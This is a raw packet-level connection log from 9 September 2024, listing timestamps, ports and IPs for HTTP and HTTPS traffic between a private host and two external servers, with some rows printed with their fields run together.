Sep 9, 2024 17:48:57.091701031 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.091721058 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.091744900 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.092338085 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.092374086 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.092385054 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.092386007 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.092434883 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.092556953 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.092571974 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.092602968 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.092613935 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.092653990 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.093199968 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.093256950 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.093269110 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.093269110 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.093305111 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.093337059 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.093527079 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.093539000 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.093549967 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.093578100 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.093609095 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.388724089 CEST | 80 | 49164 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:57.388835907 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.601005077 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.601056099 CEST | 49164 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:57.628071070 CEST | 49165 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:57.628122091 CEST | 443 | 49165 | 95.217.202.210 | 192.168.2.22
Sep 9, 2024 17:48:57.628194094 CEST | 49165 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:57.675678968 CEST | 49165 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:57.675700903 CEST | 443 | 49165 | 95.217.202.210 | 192.168.2.22
Sep 9, 2024 17:48:58.365441084 CEST | 443 | 49165 | 95.217.202.210 | 192.168.2.22
Sep 9, 2024 17:48:58.365518093 CEST | 49165 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:58.372051954 CEST | 49165 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:58.372071028 CEST | 443 | 49165 | 95.217.202.210 | 192.168.2.22
Sep 9, 2024 17:48:58.372488976 CEST | 443 | 49165 | 95.217.202.210 | 192.168.2.22
Sep 9, 2024 17:48:58.372555017 CEST | 49165 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:58.611617088 CEST | 49165 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:58.655415058 CEST | 443 | 49165 | 95.217.202.210 | 192.168.2.22
Sep 9, 2024 17:48:58.855211973 CEST | 443 | 49165 | 95.217.202.210 | 192.168.2.22
Sep 9, 2024 17:48:58.855302095 CEST | 49165 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:58.855530977 CEST | 49165 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:58.855619907 CEST | 443 | 49165 | 95.217.202.210 | 192.168.2.22
Sep 9, 2024 17:48:58.855683088 CEST | 49165 | 443 | 192.168.2.22 | 95.217.202.210
Sep 9, 2024 17:48:58.895703077 CEST | 49166 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:58.900744915 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:58.900821924 CEST | 49166 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:58.933820009 CEST | 49166 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:58.938680887 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.517690897 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.517716885 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.517729044 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.517841101 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.517851114 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.517853022 CEST | 49166 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:59.517862082 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.517900944 CEST | 49166 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:59.518002987 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.518014908 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.518028021 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.518038034 CEST | 49166 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:59.518039942 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.518059969 CEST | 49166 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:59.518071890 CEST | 49166 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:59.521348953 CEST | 49166 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:59.522772074 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.522820950 CEST | 49166 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:59.522828102 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.522862911 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.522870064 CEST | 49166 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:59.522906065 CEST | 49166 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:59.544483900 CEST | 49166 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:59.604504108 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.604553938 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.604613066 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.604648113 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.604681015 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.604686022 CEST | 49166 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:59.604711056 CEST | 49166 | 80 | 192.168.2.22 | 185.235.137.223
Sep 9, 2024 17:48:59.604715109 CEST | 80 | 49166 | 185.235.137.223 | 192.168.2.22
Sep 9, 2024 17:48:59.604722023 CEST | 49166 | 80 | 192.168.2.22 | 185.235.137.223
                                              Sep 9, 2024 17:48:59.604753017 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.604774952 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.604799986 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.605237961 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.605262995 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.605272055 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.605288982 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.605307102 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.605551958 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.605611086 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.605623960 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.605657101 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.605673075 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.605720997 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.605732918 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.605772018 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.606417894 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.606472969 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.606483936 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.606522083 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.606596947 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.606609106 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.606647015 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.607295990 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.607362032 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.607374907 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.607413054 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.609627962 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.613328934 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.689065933 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.689135075 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.689169884 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.689208984 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.689240932 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.690999985 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.691034079 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.691066980 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.691091061 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.691099882 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.691123962 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.691174984 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.691224098 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.691230059 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.691265106 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.691319942 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.691415071 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.691447973 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.691483974 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.691498995 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.691519022 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.691529036 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.691554070 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.691601992 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.692220926 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.692272902 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.692306042 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.692322016 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.692347050 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.692363024 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.692398071 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.692444086 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.693017006 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.693068981 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.693101883 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.693113089 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.693134069 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.693175077 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.693178892 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.693208933 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.693240881 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.693255901 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.693275928 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.693324089 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.693792105 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.693845034 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.693846941 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.693881035 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.693928957 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.693968058 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.694000959 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.694032907 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.694048882 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.694067001 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.694094896 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.694119930 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.694159985 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.694209099 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.694336891 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.774755001 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.774775982 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.774787903 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.774801970 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.774842978 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.774846077 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.774854898 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.774878979 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.774897099 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.774976015 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.774996996 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.775007010 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.775044918 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.775150061 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.775161028 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.775188923 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.775206089 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.775536060 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.775547981 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.775572062 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.775592089 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.775594950 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.775604010 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.775604010 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.775629044 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.775641918 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.775734901 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.775794029 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.775798082 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.775805950 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.775836945 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.777498960 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.777560949 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.777571917 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.777573109 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.777627945 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.777657032 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.777674913 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.777693987 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.777738094 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.777777910 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.777790070 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.777817011 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.777833939 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.777863979 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.777906895 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.778104067 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.778151989 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.778172016 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.778183937 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.778196096 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.778213024 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.778227091 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.778418064 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.778429031 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.778439045 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.778450966 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.778467894 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.778482914 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.778495073 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.778529882 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.779031992 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.779043913 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.779055119 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.779086113 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.779124975 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.779177904 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.779189110 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.779200077 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.779211044 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.779222012 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.779239893 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.779247999 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.779395103 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.779407978 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.779449940 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.779882908 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.779896021 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.779906034 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.779932022 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.779947042 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.780024052 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.780035019 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.780045986 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.780056953 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.780112982 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.780128002 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:48:59.780167103 CEST8049166185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:48:59.780203104 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:01.555464983 CEST4916680192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:03.713798046 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:03.720313072 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:03.720392942 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:03.721335888 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:03.727207899 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.335088015 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.335128069 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.335134983 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.335138083 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.335164070 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.335170031 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.335232973 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.335268974 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.335277081 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.335288048 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.335297108 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.335315943 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.335326910 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.335485935 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.335506916 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.335521936 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.335532904 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.335592985 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.335625887 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.339040041 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.340112925 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.340156078 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.340174913 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.340203047 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.340279102 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.340323925 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.624722004 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.624735117 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.624744892 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.624756098 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.624766111 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.624775887 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.624775887 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.624789000 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.624798059 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.624800920 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.624806881 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.624815941 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.624839067 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.625338078 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.625348091 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.625358105 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.625369072 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.625379086 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.625380039 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.625387907 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.625391006 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.625400066 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.625402927 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.625411034 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.625413895 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.625423908 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.625427008 CEST8049167185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:04.625436068 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.625446081 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.625466108 CEST4916780192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:04.625677109 CEST8049167185.235.137.223192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 9, 2024 17:49:04.625688076 CEST | 80 | 49167 | 185.235.137.223 | 192.168.2.22
